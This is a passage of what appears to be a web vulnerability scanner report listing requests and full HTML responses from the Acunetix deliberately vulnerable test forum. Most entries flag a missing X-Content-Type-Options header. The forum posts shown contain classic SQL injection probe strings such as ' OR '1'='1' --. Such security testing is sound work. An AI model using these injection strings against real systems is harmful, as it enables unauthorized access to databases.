href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' OR '1'='1' -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=14 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=14 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:27 GMT Content-Length: 4140 |
| Response Body - size: 4,140 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='2' -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=15 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=15 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:27 GMT Content-Length: 4139 |
| Response Body - size: 4,139 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" OR "1"="1" -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=16 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=16 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:27 GMT Content-Length: 4140 |
| Response Body - size: 4,140 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="2" -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=17 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=17 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:27 GMT Content-Length: 4130 |
| Response Body - size: 4,130 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> OR 1=1</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=18 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=18 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:28 GMT Content-Length: 4131 |
| Response Body - size: 4,131 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=2</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=19 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=19 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:28 GMT Content-Length: 4134 |
| Response Body - size: 4,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' OR '1'='1</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=2 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:25 GMT Content-Length: 4134 |
| Response Body - size: 4,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable 